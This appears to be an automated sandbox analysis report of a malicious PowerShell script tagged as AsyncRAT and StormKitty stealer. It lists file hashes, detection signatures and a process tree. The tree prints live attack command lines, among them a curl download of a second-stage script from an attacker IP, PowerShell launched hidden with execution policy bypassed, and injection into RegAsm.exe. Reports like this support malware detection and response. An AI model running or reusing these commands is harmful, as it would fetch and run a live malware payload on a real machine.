Analysis
-
max time kernel
94s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
03-01-2025 09:13
Static task
static1
Behavioral task
behavioral1
Sample
trwsfg.ps1
Resource
win7-20240903-en
General
-
Target
trwsfg.ps1
-
Size
1KB
-
MD5
87cb99ee4cbf9c8c190da786ff51cc5e
-
SHA1
70fcc5113233216e878781682befcedddf85eda2
-
SHA256
81c941402a1bcf018d8d965f700229b5815d03ba02ca9f2d1a22c8ace0476972
-
SHA512
85200ea2189e6e860286b9d0637698a9cf6c03380030816202e3ed0554da39bf01300470a0345f7c05b297e04e4603c2f226618fae9422d833ba22b5a47bfe6d
Malware Config
Signatures
-
Asyncrat family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral2/memory/1016-49-0x0000000000400000-0x0000000000704000-memory.dmp family_stormkitty -
Stormkitty family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 7 1284 powershell.exe 17 4796 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 4796 powershell.exe 1284 powershell.exe -
Downloads MZ/PE file
-
Drops startup file 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4796 set thread context of 1016 4796 powershell.exe 91 -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 1284 powershell.exe 1284 powershell.exe 1284 powershell.exe 1284 powershell.exe 4796 powershell.exe 4796 powershell.exe 4796 powershell.exe 4796 powershell.exe 1016 RegAsm.exe 1016 RegAsm.exe 1016 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1284 powershell.exe Token: SeDebugPrivilege 4796 powershell.exe Token: SeDebugPrivilege 1016 RegAsm.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1016 RegAsm.exe -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 1284 wrote to memory of 4712 1284 powershell.exe 84 PID 1284 wrote to memory of 4712 1284 powershell.exe 84 PID 4712 wrote to memory of 4024 4712 cmd.exe 85 PID 4712 wrote to memory of 4024 4712 cmd.exe 85 PID 4712 wrote to memory of 4796 4712 cmd.exe 86 PID 4712 wrote to memory of 4796 4712 cmd.exe 86 PID 4024 wrote to memory of 1360 4024 cmd.exe 87 PID 4024 wrote to memory of 1360 4024 cmd.exe 87 PID 4796 wrote to memory of 1444 4796 powershell.exe 88 PID 4796 wrote to memory of 1444 4796 powershell.exe 88 PID 1444 wrote to memory of 4656 1444 csc.exe 89 PID 1444 wrote to memory of 4656 1444 csc.exe 89 PID 4796 wrote to memory of 1488 4796 powershell.exe 90 PID 4796 wrote to memory of 1488 4796 powershell.exe 90 PID 4796 wrote to memory of 1488 4796 powershell.exe 90 PID 4796 wrote to memory of 1016 4796 powershell.exe 91 PID 4796 wrote to memory of 1016 4796 powershell.exe 91 PID 4796 wrote to memory of 1016 4796 powershell.exe 91 PID 4796 wrote to memory of 1016 4796 powershell.exe 91 PID 4796 wrote to memory of 1016 4796 powershell.exe 91 PID 4796 wrote to memory of 1016 4796 powershell.exe 91 PID 4796 wrote to memory of 1016 4796 powershell.exe 91 PID 4796 wrote to memory of 1016 4796 powershell.exe 91
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\trwsfg.ps11⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1284 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Modules.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:4712 -
C:\Windows\system32\cmd.execmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps13⤵
- Suspicious use of WriteProcessMemory
PID:4024 -
C:\Windows\system32\curl.execurl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps14⤵PID:1360
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4796 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jmqljpd1\jmqljpd1.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB333.tmp" "c:\Users\Admin\AppData\Local\Temp\jmqljpd1\CSC4EF0F37AA2AD4D88A93264BDD4437E9.TMP"5⤵PID:4656
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:1488
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1016
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
1KB
MD5e8bc6a8cd132e7d9b944a9f549d25627
SHA1e178ce1dd7d75e06646df19bc2f823bc471b5119
SHA256306345fd4a452c51908f5160b062a2b8a5aeeaae670bef42319286ee0d70d923
SHA512f6ef1e172a2011cf8c82034d75ca4eeabc3de26a7a15ddd19eec4a715a70a542de842fd790b0ce40aa83327805ca7955d52eb2d0870793a2b6f0c78f76ece2e0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
9KB
MD59d0626db0a70797d4ee9bd266a471a28
SHA1e4d1745a045933fc0c2813a17ada200eb1909288
SHA256bef2c4499ef2bd121548e6569feeec38f4c5b719ee35de1dc84e4338b06536f2
SHA5120f936717eed55db4cd25e6f6717f57d1bb2948fabf31ac8c41f805bcc8725ac25ad9b10be9ad73602239e64b6bbe781b664b9b9f3ad4ad7c4c01e5f4f295c0c7
-
Filesize
3KB
MD5bb445d197063475c8d78de4f0825753c
SHA1158a8e3b278affe7c1185aad67683e4253cf53dd
SHA2567066e4a496d83ee1b677ade06c868a432bb4a0dd364b19ee184147a527b11c10
SHA512173cd8a56e2fa6e8db33bc13870f8751473251aa80be2235321e62b0f84961e9fd00a236aec63342d73f262dbc7c2a920951a1a8f41707ca6640e673f21c4307
-
Filesize
652B
MD511f47bf9382a5e8cd0c3027a834fbbb8
SHA1a0f7a63169075a8f8dfa4e5ae0073c868e86b7b9
SHA256f49111c442e89f58de7dbd6cc3a4b3f7171d16bc28602b5bf82f0a4f9449ec39
SHA512a2b9bb07668f148a0b08408663a29998c9f142b8fc2720c31f99af3558751d86a16d9fc06cf61301a3f86f19fefbfcb5b6ecf934a3740564c1e5464cd647c4fa
-
Filesize
10KB
MD5b5c3a2d03ff4c721192716f326c77dea
SHA16b754fd988ca58865674b711aba76d3c6b2c5693
SHA256ab42fe5fd08cb87663e130f99f96124fdd37d825d081b9712b0bad8b6f270fac
SHA512d32e5a98c12b6b85d1913555ea54f837cd0fc647ca945aef9d75ffade06506be1f4a2348827f11c4eeae0796e4156c8f352e3c0f9a6e2cdc93cb501bcdf2c248
-
Filesize
204B
MD54e49a27891197e806f0dbcee6daee424
SHA1d49eb28ec20efdf2f4adce37d8ed3871a6e9c633
SHA2566d8031df00a944af3437f6225bfc3b6e255967c02d2339393965042b11908195
SHA512e30d7c4166e81f0410459b7def085586541e21ea5adbdd92ecc4596afd18745a3a0dcf43536abb3e56314bf611d3430549d0c984fa876f116e611000934db844